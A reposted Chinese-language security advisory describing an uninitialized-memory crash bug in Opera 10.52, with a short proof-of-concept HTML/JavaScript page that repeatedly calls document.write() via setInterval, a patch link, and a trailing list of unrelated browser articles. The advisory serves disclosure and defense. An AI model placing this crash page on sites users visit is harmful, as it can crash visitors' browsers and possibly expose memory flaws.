Opera浏览器内容写入未初始化内存漏洞

yjanguan

2010-05-04

发布日期：2010-04-27
更新日期：2010-04-29

受影响系统：
Opera Software Opera 10.52
描述：
--------------------------------------------------------------------------------
Opera是一款流行的WEB浏览器，支持多种平台。

Opera浏览器在使用document.write()函数连续向页面写入内容时存在错误，用户受骗访问了恶意网页就可以导致使用未初始化的内存，浏览器可能会崩溃。

<*来源：Mathias Karlsson

链接：http://secunia.com/advisories/39590/
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>

loop();

function loop()

{

setInterval(doit,0);

}

function doit()

{

var b="<marquee>";

document.write(b);

setInterval(loop,0);

}

</script>

</html>

建议：
--------------------------------------------------------------------------------
厂商补丁：

Opera Software
--------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://my.opera.com/desktopteam/blog/2010/04/28/opera-10-53-rc1-for-windows-and-mac

opera浏览器

yjanguan

0 关注 0 粉丝 0 动态

关注关注

Opera for Mac(欧朋浏览器)

山兔与孟婆 2019-11-06

JS学习笔记（第9章）（客户端检测）

能力检测的目标不是识别特定的浏览器，而是识别浏览器的能力。在可能的情况下，要尽量使用typeof进行能力检测。在浏览器环境下测试任何对象的某的特性是否存在，要使用下面的函数：。用户代理字符串中包含大量与浏览器有关的信息，包括浏览器、平台、操作系统及浏览器版

zaocha 2019-11-04

一只被市场遗漏的数字货币，区块链个股！

天音控股市场忽略的正宗区块链标的！数字货币钱包概念。钛媒体10月23日消息，据CoinTelegraph报道，Opera 浏览器允许在浏览器内直接使用比特币进行支付，它成为第一个实现比特币支付的浏览器。周一，该公司宣布了这一消息并做了相关说明，Opera

李世平 2019-10-24

HTML5 手机与PC的浏览器

支持Html5的浏览器包括Firefox，IE9及其更高版本，Chrome，Safari，Opera等；国内的遨游浏览器，以及基于IE或Chromium所推出的360浏览器、搜狗浏览器、QQ浏览器、猎豹浏览器等国产浏览器同样具备支持HTML5的能力。　　全

ilzxxx0 2015-11-14

浏览器内核以及调试

Chrome浏览器至发布以来一直讲究简洁、快速、安全，所以Chrome浏览器到现在一直受人追捧。1995年，opera公司发布第一版Opera浏览器，使用自己研发的Presto内核。当时opera公司的开发团队不断完善Presto内核，使Opera浏览器一

zaocha 2019-09-08

Android手机浏览器访问本地网络相关问题

为了测试开发的手机网站，常常需要使手机直接访问本地网络。在这个过程中碰到几个问题，记下来供以后参考。打开httpd.conf, 搜索127.0.0.1，注释Deny from all，增加一行Allow from 192.168.1.*。也就是说，从手机发

玫瑰余香000 2012-05-13

如何在Mozilla Firefox和Opera浏览器中使用Skype for Web

微软推出了新的Skype for Web，并进行了大量改进，但也有一些令人惊讶的变化。例如，唯一支持的平台是Windows 10和macOS，而该服务仅适用于Google Chrome和Microsoft Edge。对于许多人来说，这或多或少都有意义，因为

yanjingtp 2019-03-08

Opera 15 正式版正式发布

昨天是一个令我们这些常使用Opera 浏览器的用户非常值得庆贺的日子。因为Opera 发布了 Windows 和 Mac 系统下的全新版本 —— Opera 15 正式版！此外Opera 15还合并了地址栏和搜索条，让搜索更加简单而且直接。最后是Opera

ljqscdnljq 2014-01-20

爬虫之-----各种浏览器代理

此博文来自博主尘缘，因本人懒得写，尊重作者，IE 而IE各个版本典型的userAgent如下： Mozilla/4.0 Mozilla/4.0 Mozilla/4.0 Mozilla/4.0 其中，版本号是MSIE之后的数字。Firefox Fir

lengyu0 2016-09-21

Opera9.0 实用技巧

Opera9.0浏览器具有资源占用低、浏览速度快、功能全面的特点。Opera包括完善的网页浏览功能，Opera一款拥有独立内核的小巧浏览器。除了网页浏览外，软件还由一系列互联网套件组成，包括下载管理、BT下载、邮件客户端、R阅读器、IRC聊天、新闻组阅读、

zebperfect 2011-04-25

ubuntu 安装 opera

如果您装了微软宋体，那么会以微软宋体显示网页。如果您是Ubuntu8.x，或者7.x但是安装了文泉驿宋体，会默认以文泉驿宋体显示中文，如果字体库中没有该字，会调用文鼎字体显示。

yidaizongshi 2011-03-28

简单解决opera不能兼容ibus的问题

问题是，默认的opera配置下，无法在浏览器中使用ctrl+space启动ibus中文输入法。

pandabear 2011-03-03

浏览器的userAgent收藏

而IE各个版本典型的userAgent如下：。Firefox几个版本的userAgent大致如下：。目前，Chrome的userAgent是：。其中，版本号在Navigator之后的数字。

zzptojava天下 2013-04-16

神器Opera , 嘎子定制版(2013.07.31更新)

取出主人非vip不能共享的限制, 可下载提示“抱歉！因外链主人当前用户等级过低，该外链不支持下载！ ”，等级低怎么着，就不给下载了？如果右上角有提示“安装hao123插件”说明本脚本木生效 6、千军万马： http://www.qjwm.com 去输入验证

zzptojava天下 2013-03-14

OperaDriver

OperaDriver是WebDriver厂商OperaSoftware和志愿者开发了对于Opera的WebDriver实现。OperaDriver可以驱动浏览器对您的网页运行不通的测试，就像真实用于一样在他们之间导航。OperaDriver的终端用户模拟

hudk 2012-09-25

在Opera按下Ctrl-Space空格，无法启动中文的输入法

重启Opera之后，Ctrl-Space无法切换到中文输入法的问题，就神奇的消失了。

指尖 2010-04-26

修改浏览器User-Agent

提到了User-Agent 字符串，但大部分网友都不知道这个东西有什么用处。其实简单的说User-Agent就是客户端浏览器等应用程序使用的一种特殊的网络协议，在每次浏览器进行 HTTP 请求时发送到服务器，服务器就知道了用户是使用什么浏览器来访问的。既

zzptojava天下 2010-12-15

享受插件带来的便利 - Bookmark Syncing

因为若资料确实好，最好的办法还是转载在自己的blog中更为方便。但对于一些帮助性的网站，则需要bookmark比较好。Chrome更新到了4.x版本，突然发现它居然支持bookmark共享了。立马设置并试了一下，哇，真的不错。Chrome好像根本不支持，至

好 2010-11-25

如何在个人电脑上访问wap网站？

本教程教你如何在你的个人电脑上访问手机wap网站。有时你可能向访问某些喜欢的网站的手机版网站，有的浏览器不支持WML，无法显示页面。为了在PC上访问wap网站，你可以使用在线wap模拟器或软件。Opera,这款地球上最好的网页浏览器全面支持访问wap网站，

莫冲 2010-07-27

Firefox, Opera, IE, Safari和Chrome的真相

Firefox：能力相当全面，但是被所有的傻逼外挂组件搞得几乎没法儿用。Internet Explorer：毫无价值，不过偶尔鞭鞭尸还是不错滴。

zhangpuego 2010-03-17

安科网

Opera浏览器内容写入未初始化内存漏洞

yjanguan

yjanguan

相关推荐

Opera for Mac(欧朋浏览器)

JS学习笔记（第9章）（客户端检测）

一只被市场遗漏的数字货币，区块链个股！

HTML5 手机与PC的浏览器

浏览器内核以及调试

Android手机浏览器访问本地网络相关问题

如何在Mozilla Firefox和Opera浏览器中使用Skype for Web

Opera 15 正式版正式发布

爬虫之-----各种浏览器代理

Opera9.0 实用技巧

ubuntu 安装 opera

简单解决opera不能兼容ibus的问题

浏览器的userAgent收藏

神器Opera , 嘎子定制版(2013.07.31更新)

OperaDriver

在Opera按下Ctrl-Space空格，无法启动中文的输入法

修改浏览器User-Agent

享受插件带来的便利 - Bookmark Syncing

如何在个人电脑上访问wap网站？

Firefox, Opera, IE, Safari和Chrome的真相

yjanguan